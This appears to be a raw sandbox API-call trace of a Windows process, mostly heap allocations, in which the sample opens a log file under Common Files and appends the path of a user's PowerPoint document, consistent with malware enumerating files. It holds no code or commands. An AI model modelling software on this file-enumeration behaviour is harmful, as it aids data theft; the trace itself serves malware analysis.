[0179.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0179.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.630] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0179.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0179.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0179.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0179.630] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0179.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0179.630] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0179.632] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.632] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0179.632] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.632] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0179.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0179.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0179.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0179.633] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0179.633] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x1b29, lpOverlapped=0x0) returned 1 [0179.633] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0179.633] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x1b29, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.633] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0179.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0179.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0179.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.flyingship.pps\r\n", cchWideChar=96, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 96 [0179.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0179.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.flyingship.pps\r\n", cchWideChar=96, lpMultiByteStr=0x9a5d78, cbMultiByte=96, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.flyingship.pps\r\n", lpUsedDefaultChar=0x0) returned 96 [0179.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0179.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0179.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0179.634] WriteFile (in: hFile=0x120, lpBuffer=0x9a5d10*, nNumberOfBytesToWrite=0x5f, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d10*, lpNumberOfBytesWritten=0x87f43c*=0x5f, lpOverlapped=0x0) returned 1 [0179.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0179.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.634] CloseHandle (hObject=0x120) returned 1 [0179.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0179.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0179.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0179.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0179.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0179.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0179.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0179.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0179.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0179.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0179.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0179.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0179.638] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0179.638] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0179.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0179.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0179.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0179.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6cd8 | out: hHeap=0x8a0000) returned 1 [0179.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0179.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0179.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0179.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0179.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0179.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0179.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0179.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0179.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0179.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0179.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0179.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0179.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0179.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0179.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0179.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0179.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0179.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0179.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0179.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0179.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0179.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0179.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0179.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0179.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0179.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0179.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0179.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0179.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0179.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0179.639] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0179.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0179.639] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0179.639] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0179.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0179.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0179.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0179.640] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0179.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0179.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0179.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0179.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1980 [0179.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0179.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0179.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0179.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0179.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0179.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0179.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0179.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda38 [0179.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0179.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0179.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0179.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0179.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0179.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0179.640] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0179.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0179.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0179.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0179.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0179.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0179.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0179.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0179.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0179.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0179.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0179.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0179.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0179.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0179.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0179.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0179.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0179.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0179.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0179.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0179.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0179.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0179.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0179.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0179.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0179.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0179.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0179.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0179.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0179.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0179.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0179.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0179.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0179.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0179.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0179.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0179.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0179.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0179.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0179.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0179.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0179.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0179.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0179.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0179.644] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0179.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0179.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0179.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0179.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0179.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0179.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0179.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0179.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0179.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0179.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0179.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0179.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0179.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0179.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0179.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0179.645] 